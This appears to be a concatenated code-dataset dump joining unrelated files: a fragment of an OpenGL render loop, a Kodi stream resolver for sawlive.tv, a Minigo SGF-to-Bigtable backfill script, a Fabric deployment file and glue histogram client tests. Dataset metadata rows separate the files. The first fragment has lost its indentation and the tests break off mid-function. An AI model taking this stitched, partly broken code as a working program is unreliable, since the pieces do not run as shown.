""" render normal scene """
self.scene_manager.ocean.simulateFFTWaves()
# render gbuffer & preprocess
camera = self.scene_manager.main_camera
self.uniform_view_projection_data['VIEW_PROJECTION'][...] = camera.view_projection_jitter
self.uniform_view_projection_data['PREV_VIEW_PROJECTION'][...] = camera.prev_view_projection_jitter
self.uniform_view_projection_buffer.bind_uniform_block(data=self.uniform_view_projection_data)
self.render_gbuffer()
self.render_preprocess()
self.render_shadow()
# render solid
camera = self.scene_manager.main_camera
self.uniform_view_projection_data['VIEW_PROJECTION'][...] = camera.view_projection_jitter
self.uniform_view_projection_data['PREV_VIEW_PROJECTION'][...] = camera.prev_view_projection_jitter
self.uniform_view_projection_buffer.bind_uniform_block(data=self.uniform_view_projection_data)
glFrontFace(GL_CCW)
            glDepthMask(False)  # depth was already written by the depth pre-pass / gbuffer pass
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR, depth_texture=RenderTargets.DEPTH)
glClear(GL_COLOR_BUFFER_BIT)
self.render_solid()
# copy HDR Target
src_framebuffer = self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
dst_framebuffer = self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR_TEMP)
glClear(GL_COLOR_BUFFER_BIT)
dst_framebuffer.copy_framebuffer(src_framebuffer)
src_framebuffer.bind_framebuffer()
# set common projection matrix
camera = self.scene_manager.main_camera
self.uniform_view_projection_data['VIEW_PROJECTION'][...] = camera.view_projection
self.uniform_view_projection_data['PREV_VIEW_PROJECTION'][...] = camera.prev_view_projection
self.uniform_view_projection_buffer.bind_uniform_block(data=self.uniform_view_projection_data)
# render ocean
if self.scene_manager.ocean.is_render_ocean:
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR, depth_texture=RenderTargets.DEPTH)
glDisable(GL_CULL_FACE)
glEnable(GL_DEPTH_TEST)
glDepthMask(True)
self.scene_manager.ocean.render_ocean(atmosphere=self.scene_manager.atmosphere,
texture_scene=RenderTargets.HDR_TEMP,
texture_linear_depth=RenderTargets.LINEAR_DEPTH,
texture_probe=RenderTargets.LIGHT_PROBE_ATMOSPHERE,
texture_shadow=RenderTargets.COMPOSITE_SHADOWMAP)
                # re-copy linear depth (the ocean pass wrote new depth values)
self.framebuffer_manager.bind_framebuffer(RenderTargets.LINEAR_DEPTH)
self.postprocess.render_linear_depth(RenderTargets.DEPTH, RenderTargets.LINEAR_DEPTH)
# render atmosphere
if self.scene_manager.atmosphere.is_render_atmosphere:
self.framebuffer_manager.bind_framebuffer(RenderTargets.ATMOSPHERE,
RenderTargets.ATMOSPHERE_INSCATTER)
self.scene_manager.atmosphere.render_precomputed_atmosphere(RenderTargets.LINEAR_DEPTH,
RenderTargets.COMPOSITE_SHADOWMAP,
RenderOption.RENDER_LIGHT_PROBE)
glEnable(GL_CULL_FACE)
glEnable(GL_DEPTH_TEST)
glDepthMask(False)
# Composite Atmosphere
if self.scene_manager.atmosphere.is_render_atmosphere:
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
self.set_blend_state(True, GL_FUNC_ADD, GL_ONE, GL_ONE_MINUS_SRC_ALPHA)
composite_atmosphere = self.resource_manager.get_material_instance("precomputed_atmosphere.composite_atmosphere")
composite_atmosphere.use_program()
above_the_cloud = self.scene_manager.atmosphere.cloud_altitude < main_camera.transform.get_pos()[1]
composite_atmosphere.bind_uniform_data("above_the_cloud", above_the_cloud)
composite_atmosphere.bind_uniform_data("inscatter_power", self.scene_manager.atmosphere.inscatter_power)
composite_atmosphere.bind_uniform_data("texture_atmosphere", RenderTargets.ATMOSPHERE)
composite_atmosphere.bind_uniform_data("texture_inscatter", RenderTargets.ATMOSPHERE_INSCATTER)
composite_atmosphere.bind_uniform_data("texture_linear_depth", RenderTargets.LINEAR_DEPTH)
self.postprocess.draw_elements()
# prepare translucent
self.set_blend_state(True, GL_FUNC_ADD, GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR, depth_texture=RenderTargets.DEPTH)
glEnable(GL_DEPTH_TEST)
# Translucent
self.render_translucent()
# render particle
if RenderOption.RENDER_EFFECT:
glDisable(GL_CULL_FACE)
glEnable(GL_BLEND)
self.render_effect()
glDisable(GL_BLEND)
glEnable(GL_CULL_FACE)
# render probe done
if RenderOption.RENDER_LIGHT_PROBE:
return
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
self.set_blend_state(False)
self.render_postprocess()
if RenderOption.RENDER_OBJECT_ID:
self.render_object_id()
self.render_selected_object()
# debug render target
if self.debug_texture is not None:
self.set_blend_state(False)
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_texture(self.debug_texture)
if RenderOption.RENDER_FONT:
self.set_blend_state(True, GL_FUNC_ADD, GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
self.render_log()
if RenderOption.RENDER_DEBUG_LINE and self.debug_texture is None:
# render world axis
self.set_blend_state(True, GL_FUNC_ADD, GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER, depth_texture=RenderTargets.DEPTH)
self.render_axis()
self.debug_line_manager.bind_render_spline_program()
for spline in self.scene_manager.splines:
self.debug_line_manager.render_spline(spline)
self.debug_line_manager.render_debug_lines()
if RenderOption.RENDER_GIZMO and self.debug_texture is None:
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER, depth_texture=RenderTargets.DEPTH)
glEnable(GL_DEPTH_TEST)
glDepthMask(True)
self.set_blend_state(True, GL_FUNC_ADD, GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
# render spline gizmo
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.GIZMO,
self.scene_manager.spline_gizmo_render_infos,
self.render_color_material)
# render transform axis gizmo
glClear(GL_DEPTH_BUFFER_BIT)
self.render_axis_gizmo(RenderMode.GIZMO)
| bsd-2-clause | -7,607,777,899,450,570,000 | 50.525467 | 173 | 0.595565 | false | 3.928608 | false | false | false |
azumimuo/family-xbmc-addon | script.module.liveresolver/lib/liveresolver/resolvers/sawlive.py | 1 | 3289 | # -*- coding: utf-8 -*-
import re,urllib,urlparse,base64
from liveresolver.modules import client,decryptionUtils
from liveresolver.modules import jsunpack
from liveresolver.modules.log_utils import log
def resolve(url):
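    """Resolve a sawlive.tv embed URL to a playable stream URL: demystify the
    obfuscated player page, return an m3u8 link when one resolves, otherwise
    assemble the rtmp URL (playpath/swfUrl/pageUrl)."""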
try:
page = re.compile('//(.+?)/(?:embed|v)/([0-9a-zA-Z-_]+)').findall(url)[0]
page = 'http://%s/embed/%s' % (page[0], page[1])
try: referer = urlparse.parse_qs(urlparse.urlparse(url).query)['referer'][0]
except: referer = page
try: host = urlparse.parse_qs(urlparse.urlparse(url).query)['host'][0]
except: host = 'sawlive.tv'
headers={'User-Agent': client.agent(),'Host': host, 'Referer': referer, 'Connection': 'keep-alive'}
result = client.request(page, referer=referer)
result = decryptionUtils.doDemystify(result)
url = client.parseDOM(result, 'iframe', ret='src')[-1]
url = url.replace(' ', '').replace('+','')
var = re.compile('var\s(.+?)\s*=\s*[\'\"](.+?)[\'\"]').findall(result)
for i in range(100):
for v in var: result = result.replace(" %s " % v[0], ' %s '%v[1])
var = re.compile('var\s(.+?)\s*=\s*[\'\"](.+?)[\'\"]').findall(result)
var_dict = dict(var)
for v in var:
if '+' in v[1]:
ss = v[1].rstrip('+').replace('"+','').split('+')
sg = v[1].rstrip('+').replace('"+','')
for s in ss:
sg = sg.replace(s, var_dict[s])
var_dict[v[0]]=sg.replace('+','')
for i in range(100):
for v in var_dict.keys(): url = url.replace("'%s'" % v, var_dict[v])
for v in var_dict.keys(): url = url.replace("(%s)" % v, "(%s)" % var_dict[v])
result = client.request(url, headers = headers)
result = decryptionUtils.doDemystify(result)
var = re.compile('var\s(.+?)\s*=\s*[\'\"](.+?)[\'\"]').findall(result)
var_dict = dict(var)
file = re.compile("'file'\s*(.+?)\)").findall(result)[0]
file = file.replace('\'','')
for v in var_dict.keys():
file = file.replace(v,var_dict[v])
file = file.replace('+','').replace(',','').strip()
log("Sawlive: Found file url: " + file)
try:
log("Sawlive: Finding m3u8 link.")
if not file.startswith('http'): raise Exception()
url = client.request(file, output='geturl')
if not '.m3u8' in url: raise Exception()
url += '|%s' % urllib.urlencode({'User-Agent': client.agent(), 'Referer': file})
log("Sawlive: Found m3u8 link: " + url)
return url
except:
log("Sawlive: m3u8 link not found, finding rtmp.")
pass
strm = re.compile("'streamer'.+?'(.+?)'").findall(result)[0]
swf = re.compile("SWFObject\('(.+?)'").findall(result)[0]
url = '%s playpath=%s swfUrl=%s pageUrl=%s live=1 timeout=60' % (strm, file, swf, url)
url = urllib.unquote(url)
log("Sawlive: rtmp link found: " + url)
return url
except Exception as e:
log("Sawlive exception:\n" + str(e))
log("Sawlive: Resolver failed. Returning...")
return
| gpl-2.0 | -8,261,275,550,164,415,000 | 39.109756 | 107 | 0.511402 | false | 3.498936 | false | false | false |
mlcommons/training | reinforcement/tensorflow/minigo/oneoffs/eval_sgf_to_cbt.py | 4 | 8454 | #!/usr/bin/env python3
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Write Minigo eval_game records to Bigtable.
This is used to backfill eval games from before they were written by
cc-evaluator as part of https://github.com/tensorflow/minigo/pull/709
"""
import sys
sys.path.insert(0, '.')
import itertools
import multiprocessing
import os
import re
from collections import Counter
from absl import app, flags
from google.cloud import bigtable
from google.cloud.bigtable import row_filters
from tqdm import tqdm
from tensorflow import gfile
import sgf_wrapper
from bigtable_input import METADATA, TABLE_STATE
flags.DEFINE_string(
'sgf_glob', None,
'Glob for SGFs to backfill into eval_games bigtable.')
flags.mark_flags_as_required([
'sgf_glob', 'cbt_project', 'cbt_instance', 'cbt_table'
])
FLAGS = flags.FLAGS
# Constants
EVAL_PREFIX = 'e_{:0>10}'
EVAL_GAME_COUNTER = b'eval_game_counter'
SGF_FILENAME = b'sgf'
#### Common Filters
EVAL_COUNT_FILTER = row_filters.ColumnRangeFilter(
METADATA, EVAL_GAME_COUNTER, EVAL_GAME_COUNTER)
#### START ####
def grouper(iterable, n):
iterator = iter(iterable)
group = tuple(itertools.islice(iterator, n))
while group:
yield group
group = tuple(itertools.islice(iterator, n))
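# A quick sanity example (illustrative, not from the original source):
#   list(grouper('ABCDE', 2)) == [('A', 'B'), ('C', 'D'), ('E',)]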
def latest_game_number(bt_table):
"""Return the number of the last game to be written."""
# TODO(amj): Update documentation on latest_game_number (last game or next game)?
table_state = bt_table.read_row(TABLE_STATE, filter_=EVAL_COUNT_FILTER)
if table_state is None:
return 0
value = table_state.cell_value(METADATA, EVAL_GAME_COUNTER)
# see bigtable_input.py cbt_intvalue(...)
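    # e.g. int.from_bytes(b'\x00\x2a', byteorder='big') == 42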
return int.from_bytes(value, byteorder='big')
def read_existing_paths(bt_table):
"""Return the SGF filename for each existing eval record."""
rows = bt_table.read_rows(
filter_=row_filters.ColumnRangeFilter(
METADATA, SGF_FILENAME, SGF_FILENAME))
names = (row.cell_value(METADATA, SGF_FILENAME).decode() for row in rows)
processed = [os.path.splitext(os.path.basename(r))[0] for r in names]
return processed
def canonical_name(sgf_name):
"""Keep filename and some date folders"""
sgf_name = os.path.normpath(sgf_name)
assert sgf_name.endswith('.sgf'), sgf_name
# Strip off '.sgf'
sgf_name = sgf_name[:-4]
# Often eval is inside a folder with the run name.
# include from folder before /eval/ if part of path.
with_folder = re.search(r'/([^/]*/eval/.*)', sgf_name)
if with_folder:
return with_folder.group(1)
# Return the filename
return os.path.basename(sgf_name)
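# Illustrative examples (the paths are hypothetical):
#   canonical_name('gs://bucket/v17-2019/eval/123/game-0.sgf') -> 'v17-2019/eval/123/game-0'
#   canonical_name('games/game-1.sgf') -> 'game-1'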
def process_game(path):
with open(path) as f:
sgf_contents = f.read()
root_node = sgf_wrapper.get_sgf_root_node(sgf_contents)
assert root_node.properties['FF'] == ['4'], ("Bad game record", path)
result = root_node.properties['RE'][0]
assert result.lower()[0] in 'bw', result
assert result.lower()[1] == '+', result
black_won = result.lower()[0] == 'b'
length = 0
node = root_node.next
while node:
props = node.properties
length += 1 if props.get('B') or props.get('W') else 0
node = node.next
sgf_path = canonical_name(path)
return (
(b"black", root_node.properties['PB'][0]),
(b"white", root_node.properties['PW'][0]),
# All values are strings, "1" for true and "0" for false here
(b"black_won", '1' if black_won else '0'),
(b"white_won", '0' if black_won else '1'),
(b"result", result),
(b"length", str(length)),
(b"sgf", sgf_path),
(b"tag", ""),
(b"tool", "eval_sgf_to_cbt"),
)
def read_games(glob, existing_paths):
"""Read all SGFs that match glob
Parse each game and extract relevant metadata for eval games table.
"""
globbed = sorted(gfile.Glob(glob))
skipped = 0
to_parse = []
for sgf_name in tqdm(globbed):
assert sgf_name.lower().endswith('.sgf'), sgf_name
sgf_path = canonical_name(sgf_name)
sgf_filename = os.path.basename(sgf_path)
if sgf_path in existing_paths or sgf_filename in existing_paths:
skipped += 1
continue
to_parse.append(sgf_name)
game_data = []
with multiprocessing.Pool() as pool:
game_data = pool.map(process_game, tqdm(to_parse), 100)
print("Read {} SGFs, {} new, {} existing".format(
len(globbed), len(game_data), skipped))
return game_data
def write_eval_records(bt_table, game_data, last_game):
"""Write all eval_records to eval_table
In addition to writing new rows table_state must be updated in
row `table_state` columns `metadata:eval_game_counter`
Args:
bt_table: bigtable table to add rows to.
game_data: metadata pairs (column name, value) for each eval record.
last_game: last_game in metadata:table_state
"""
eval_num = last_game
# Each column counts as a mutation so max rows is ~10000
GAMES_PER_COMMIT = 2000
for games in grouper(tqdm(game_data), GAMES_PER_COMMIT):
        assert bt_table.read_row(EVAL_PREFIX.format(eval_num)), "Previous row doesn't exist"
assert bt_table.read_row(EVAL_PREFIX.format(eval_num+1)) is None, "Row already exists"
rows = []
for i, metadata in enumerate(games):
eval_num += 1
row_name = EVAL_PREFIX.format(eval_num)
row = bt_table.row(row_name)
for column, value in metadata:
row.set_cell(METADATA, column, value)
rows.append(row)
# For each batch of games print a couple of the rows being added.
if i < 5 or i + 5 > len(games):
print("\t", i, row_name, metadata[6][1])
if eval_num == last_game + len(games):
test = input("Commit ('y'/'yes' required): ")
if test.lower() not in ('y', 'yes'):
break
# TODO(derek): Figure out how to condition on atomic counter update.
# Condition all updates on the current value of last_game
game_num_update = bt_table.row(TABLE_STATE)
game_num_update.set_cell(METADATA, EVAL_GAME_COUNTER, eval_num)
print(TABLE_STATE, eval_num)
response = bt_table.mutate_rows(rows)
# validate that all rows written successfully
any_bad = False
for i, status in enumerate(response):
            if status.code != 0:
print("Row number {} failed to write {}".format(i, status))
any_bad = True
if any_bad:
break
game_num_update.commit()
def main(unusedargv):
"""All of the magic together."""
del unusedargv
bt_table = (bigtable
.Client(FLAGS.cbt_project, admin=True)
.instance(FLAGS.cbt_instance)
.table(FLAGS.cbt_table))
assert bt_table.exists(), "Table doesn't exist"
# Get current game counter, updates are conditioned on this matching.
last_game = latest_game_number(bt_table)
print("eval_game_counter:", last_game)
print()
# Get existing SGF paths so we avoid uploading duplicates
existing_paths = read_existing_paths(bt_table)
print("Found {} existing".format(len(existing_paths)))
if existing_paths:
duplicates = Counter(existing_paths)
existing_paths = set(existing_paths)
for k, v in duplicates.most_common():
if v == 1:
break
print("{}x{}".format(v, k))
print("\tmin:", min(existing_paths))
print("\tmax:", max(existing_paths))
print()
# Get all SGFs that match glob, skipping SGFs with existing records.
data = read_games(FLAGS.sgf_glob, existing_paths)
if data:
write_eval_records(bt_table, data, last_game)
if __name__ == "__main__":
app.run(main)
| apache-2.0 | 7,526,406,922,997,493,000 | 29.854015 | 94 | 0.632127 | false | 3.532804 | false | false | false |
antin/Open-Knesset | fabfile.py | 11 | 3568 | from fabric.api import run, cd, sudo, roles, runs_once, env
from fabric.contrib.files import first
# add a local_fab_settings.py file,
# so that you can access your servers
# but please, don't commit it to git.
try:
from local_fab_settings import *
except ImportError:
pass
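# A minimal local_fab_settings.py might look like this (hostnames are placeholders):
#   env.roledefs = {
#       'web': ['web1.example.org'],
#       'db': ['db1.example.org'],
#       'db_master': ['db1.example.org'],
#       'all': ['web1.example.org', 'db1.example.org'],
#   }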
env.venv_roots = ['/oknesset_web/oknesset/', '/oknesset_data/oknesset/']
env.project_dir = 'Open-Knesset'
env.ok_user = 'oknesset'
def _venv_root():
return first(*env.venv_roots)
def _project_root():
return _venv_root() + env.project_dir
def _activate():
return 'source ' + _venv_root() + 'bin/activate'
def virtualenv(command):
with cd(_project_root()):
sudo(_activate() + ' && ' + command, user=env.ok_user)
# web server stuff
def web_apache_cmd(cmd):
if cmd not in ['start', 'stop', 'restart']:
raise Exception('Unknown apache command %s' % cmd)
sudo('/etc/init.d/apache2 %s' % cmd)
def restart_oknesset():
sudo('supervisorctl restart oknesset')
def _update_commit():
with cd(_project_root()):
sudo(
'git log --pretty=format:"Code Commit: %H <br>Last Update: %cd" -n 1 > templates/last_build.txt',
user=env.ok_user)
def _chown(to_user, directory=env.project_dir):
sudo("chown -R %s %s" % (to_user, directory))
@roles('web')
def deploy_web(requirements=False):
web_apache_cmd('stop')
with cd(_venv_root()):
_chown(env.ok_user)
with cd(env.project_dir):
_git_pull()
if requirements:
_install_requirements()
virtualenv('./manage.py collectstatic --noinput')
_update_commit()
#_chown('www-data')
restart_oknesset()
web_apache_cmd('start')
# db server stuff - should only run once on master db!
@runs_once
def db_migrate_syncdb():
virtualenv('./manage.py migrate')
@roles('db')
def deploy_backend(migration=False, requirements=False):
with cd(_project_root()):
_git_pull()
if requirements:
_install_requirements()
if migration:
db_migrate_syncdb()
@roles('db_master')
def show_cron(as_user=env.ok_user):
sudo('crontab -l', user=as_user)
@roles('db')
def db_show_replication():
# works on both servers
run('ps -ef | grep postgres | grep -e receiver -e sender')
# memcache commands
@roles('web')
@runs_once
def mc_flushall():
#run('echo flush_all | telnet localhost 11211')
virtualenv(
"DJANGO_SETTINGS_MODULE='knesset.settings' " +
"python -c 'from django.core.cache import cache; cache.clear()'"
)
# commands for all servers
def _git_pull(repo='origin', branch='master', as_user=env.ok_user):
sudo("git pull %s %s" % (repo, branch), user=as_user)
def _install_requirements():
virtualenv(
'cd .. && pip install -r ' +
env.project_dir + '/requirements.txt && cd ' + _project_root())
@roles('all')
def all_upgrade_system():
sudo('apt-get update')
sudo('apt-get upgrade')
@roles('all')
def show_updates():
sudo('cat /var/lib/update-notifier/updates-available')
sudo('/usr/lib/update-notifier/update-motd-reboot-required')
@roles('all')
def all_run_cmd(cmd):
run(cmd)
@roles('all')
def all_sudo_cmd(cmd):
sudo(cmd)
def deploy_all(repo='origin', branch='master', install_requirements=False, use_migration=False, reset_memcache=False):
deploy_backend(requirements=install_requirements, migration=use_migration)
deploy_web(requirements=install_requirements)
if reset_memcache:
mc_flushall()
| bsd-3-clause | -1,471,443,326,784,855,600 | 22.629139 | 118 | 0.632848 | false | 3.312906 | false | false | false |
glue-viz/glue-qt | glue/clients/tests/test_histogram_client.py | 1 | 17190 | #pylint: disable=I0011,W0613,W0201,W0212,E1101,E1103
import pytest
from mock import MagicMock
import matplotlib.pyplot as plt
import numpy as np
from ..histogram_client import HistogramClient
from ..layer_artist import HistogramLayerArtist
from ...core.data_collection import DataCollection
from ...core.exceptions import IncompatibleDataException
from ...core.hub import Hub
from ...core.data import Data
from ...core.subset import RangeSubsetState
FIGURE = plt.figure()
plt.close('all')
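# A single module-level figure is shared by all tests; TestHistogramClient's
# setup mocks FIGURE.canvas.draw so draw_count() can count redraws per action.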
class TestException(Exception):
pass
class TestHistogramClient(object):
def setup_method(self, method):
self.data = Data(x=[0, 0, 0, 1, 2, 3, 3, 10, 20],
y=[-1, -1, -1, -2, -2, -2, -3, -5, -10])
self.subset = self.data.new_subset()
self.collect = DataCollection(self.data)
self.client = HistogramClient(self.collect, FIGURE)
self.axes = self.client.axes
FIGURE.canvas.draw = MagicMock()
assert FIGURE.canvas.draw.call_count == 0
def draw_count(self):
return self.axes.figure.canvas.draw.call_count
def layer_drawn(self, layer):
return layer in self.client._artists and \
all(a.visible for a in self.client._artists[layer]) and \
all(len(a.artists) > 0 for a in self.client._artists[layer])
def layer_present(self, layer):
return layer in self.client._artists
def assert_autoscaled(self):
yra = self.client.axes.get_ylim()
datara = [99999, -99999]
for a in self.client._artists:
y = a.y
if a.y.size > 0:
datara[0] = min(datara[0], a.y.min())
datara[1] = max(datara[1], a.y.max())
np.testing.assert_array_almost_equal(yra[0], 0)
np.testing.assert_array_almost_equal(datara[1], yra[1])
def test_empty_on_creation(self):
assert self.data not in self.client._artists
def test_add_layer(self):
self.client.add_layer(self.data)
assert self.layer_present(self.data)
assert not self.layer_drawn(self.data)
self.client.set_component(self.data.components[0])
assert self.layer_drawn(self.data)
def test_add_invalid_layer_raises(self):
self.collect.remove(self.data)
with pytest.raises(IncompatibleDataException) as exc:
self.client.add_layer(self.data)
def test_add_subset_auto_adds_data(self):
subset = self.data.new_subset()
self.client.add_layer(subset)
assert self.layer_present(self.data)
assert self.layer_present(subset)
self.client.set_component(self.data.components[0])
assert self.layer_drawn(self.data)
def test_double_add_ignored(self):
self.client.add_layer(self.data)
art = self.client._artists[self.data]
self.client.add_layer(self.data)
assert self.client._artists[self.data] == art
def test_add_data_auto_adds_subsets(self):
s = self.data.new_subset()
self.client.add_layer(self.data)
assert self.layer_present(s)
def test_data_removal(self):
self.client.add_layer(self.data)
self.client.remove_layer(self.data)
assert not (self.layer_present(self.data))
def test_data_removal_removes_subsets(self):
self.client.add_layer(self.data)
self.client.remove_layer(self.data)
s = self.data.new_subset()
assert len(self.data.subsets) > 0
for subset in self.data.subsets:
assert not (self.layer_present(subset))
def test_layer_updates_on_data_add(self):
self.client.add_layer(self.data)
for s in self.data.subsets:
assert s in self.client._artists
def test_set_component_updates_component(self):
self.client.add_layer(self.data)
comp = self.data.find_component_id('uniform')
self.client.set_component(comp)
assert self.client._component is comp
def test_set_component_redraws(self):
self.client.add_layer(self.data)
comp = self.data.find_component_id('uniform')
ct0 = self.draw_count()
self.client.set_component(comp)
assert self.draw_count() > ct0
def test_remove_not_present_ignored(self):
self.client.remove_layer(self.data)
def test_set_visible_external_data(self):
self.client.set_layer_visible(None, False)
def test_get_visible_external_data(self):
assert not (self.client.is_layer_visible(None))
def test_set_visible(self):
self.client.add_layer(self.data)
self.client.set_layer_visible(self.data, False)
assert not (self.client.is_layer_visible(self.data))
def test_draw_histogram_one_layer(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.find_component_id('uniform'))
def test_draw_histogram_subset_hidden(self):
self.client.add_layer(self.data)
s = self.data.new_subset()
self.client.set_layer_visible(s, False)
self.client.set_component(self.data.find_component_id('uniform'))
def test_draw_histogram_two_layers(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.find_component_id('uniform'))
def test_update_property_set_triggers_redraw(self):
self.client.add_layer(self.data)
ct = self.draw_count()
self.client.normed ^= True
assert self.draw_count() > ct
@pytest.mark.parametrize(('prop'), ['normed', 'cumulative'])
def test_set_boolean_property(self, prop):
"""Boolean properties should sync with artists"""
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
setattr(self.client, prop, False)
for a in self.client._artists:
assert not getattr(a, prop)
setattr(self.client, prop, True)
for a in self.client._artists:
assert getattr(a, prop)
def test_set_nbins(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
self.client.nbins = 100
for a in self.client._artists[self.data]:
assert a.nbins == 100
assert a.x.size == 100 + 1
def test_autoscale(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
self.client.axes.set_ylim(0, .1)
self.client.autoscale = False
self.client.autoscale = True
self.assert_autoscaled()
def test_xlimits(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
self.client.xlimits = -12, 20
assert self.client.xlimits == (-12, 20)
for a in self.client._artists[self.data]:
assert a.lo == -12
assert a.hi == 20
def test_set_xlimits_out_of_data_range(self):
"""Setting xlimits outside of range shouldn't crash"""
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
self.client.xlimits = 100, 200
self.client.xlimits = -200, -100
def test_component_property(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
assert self.client.component is self.data.components[0]
def test_apply_roi(self):
self.client.add_layer(self.data)
self.data.edit_subset = [self.data.subsets[0]]
roi = MagicMock()
roi.to_polygon.return_value = [1, 2, 3], [2, 3, 4]
self.client.apply_roi(roi)
state = self.data.subsets[0].subset_state
assert isinstance(state, RangeSubsetState)
assert state.lo == 1
assert state.hi == 3
def test_apply_roi_xlog(self):
self.client.add_layer(self.data)
self.data.edit_subset = [self.data.subsets[0]]
self.client.xlog = True
roi = MagicMock()
roi.to_polygon.return_value = [1, 2, 3], [2, 3, 4]
self.client.apply_roi(roi)
state = self.data.subsets[0].subset_state
assert isinstance(state, RangeSubsetState)
assert state.lo == 10
assert state.hi == 1000
def test_xlimits_sticky_with_component(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
self.client.xlimits = 5, 6
self.client.set_component(self.data.components[1])
self.client.xlimits = 7, 8
self.client.set_component(self.data.components[0])
assert self.client.xlimits == (5, 6)
self.client.set_component(self.data.components[1])
assert self.client.xlimits == (7, 8)
def test_default_xlimits(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.id['x'])
assert self.client.xlimits == (0, 20)
self.client.set_component(self.data.id['y'])
assert self.client.xlimits == (-10, -1)
def test_xlimit_single_set(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.id['x'])
self.client.xlimits = (None, 5)
assert self.client.xlimits == (0, 5)
self.client.xlimits = (3, None)
assert self.client.xlimits == (3, 5)
def test_xlimit_reverse_set(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.id['x'])
self.client.xlimits = 5, 3
assert self.client.xlimits == (3, 5)
def test_xlog_axes_labels(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.id['x'])
self.client.xlog = True
assert self.client.axes.get_xlabel() == 'Log x'
self.client.xlog = False
assert self.client.axes.get_xlabel() == 'x'
self.client.ylog = True
assert self.client.axes.get_ylabel() == 'N'
self.client.ylog = False
assert self.client.axes.get_ylabel() == 'N'
def test_xlog_snaps_limits(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.id['x'])
self.client.axes.set_xlim((-1, 1))
self.client.xlog = True
assert self.client.axes.get_xlim() != (-1, 1)
def test_artist_clear_resets_arrays(self):
self.client.add_layer(self.data)
self.client.set_component(self.data.components[0])
for a in self.client._artists[self.data]:
assert a.get_data()[0].size > 0
a.clear()
assert a.get_data()[0].size == 0
class TestCommunication(object):
def setup_method(self, method):
self.data = Data(x=[1, 2, 3, 2, 2, 3, 1])
figure = MagicMock()
self.collect = DataCollection()
self.client = HistogramClient(self.collect, figure)
self.axes = self.client.axes
self.hub = Hub()
self.connect()
def draw_count(self):
return self.axes.figure.canvas.draw.call_count
def connect(self):
self.client.register_to_hub(self.hub)
self.collect.register_to_hub(self.hub)
def test_ignore_data_add_message(self):
self.collect.append(self.data)
assert not (self.client.layer_present(self.data))
def test_update_data_ignored_if_data_not_present(self):
self.collect.append(self.data)
ct0 = self.draw_count()
self.data.style.color = 'blue'
assert self.draw_count() == ct0
def test_update_data_processed_if_data_present(self):
self.collect.append(self.data)
self.client.add_layer(self.data)
ct0 = self.draw_count()
self.data.style.color = 'blue'
assert self.draw_count() > ct0
def test_add_subset_ignored_if_data_not_present(self):
self.collect.append(self.data)
ct0 = self.draw_count()
sub = self.data.new_subset()
assert not (self.client.layer_present(sub))
def test_add_subset_processed_if_data_present(self):
self.collect.append(self.data)
self.client.add_layer(self.data)
sub = self.data.new_subset()
assert (self.client.layer_present(sub))
def test_update_subset_ignored_if_not_present(self):
self.collect.append(self.data)
self.client.add_layer(self.data)
sub = self.data.new_subset()
self.client.remove_layer(sub)
ct0 = self.draw_count()
sub.style.color = 'blue'
assert self.draw_count() == ct0
def test_update_subset_processed_if_present(self):
self.collect.append(self.data)
self.client.add_layer(self.data)
sub = self.data.new_subset()
ct0 = self.draw_count()
sub.style.color = 'blue'
assert self.draw_count() > ct0
def test_data_remove_message(self):
self.collect.append(self.data)
self.client.add_layer(self.data)
self.collect.remove(self.data)
assert not self.client.layer_present(self.data)
def test_subset_remove_message(self):
self.collect.append(self.data)
self.client.add_layer(self.data)
sub = self.data.new_subset()
assert self.client.layer_present(sub)
sub.delete()
assert not self.client.layer_present(sub)
class TestHistogramLayerArtist(object):
def setup_subset(self):
ax = MagicMock()
d = Data(x=[1, 2, 3])
s = d.new_subset()
s.subset_state = d.id['x'] > 1
self.artist = HistogramLayerArtist(s, ax)
def setup_hist_calc_counter(self):
self.setup_subset()
m = MagicMock()
self.artist._calculate_histogram = m
return m
def setup_hist_scale_counter(self):
self.setup_subset()
m = MagicMock()
self.artist._scale_histogram = m
self.artist._calculate_histogram = MagicMock()
return m
def test_calculate_histogram_efficient(self):
ct = self.setup_hist_calc_counter()
self.artist.update()
assert ct.call_count == 1
self.artist.update()
assert ct.call_count == 1
def test_recalc_on_state_changes(self):
ct = self.setup_hist_calc_counter()
assert ct.call_count == 0
self.artist.update()
assert ct.call_count == 1
#lo
self.artist.lo -= 1
self.artist.update()
self.artist.update()
assert ct.call_count == 2
#hi
self.artist.hi -= 1
self.artist.update()
self.artist.update()
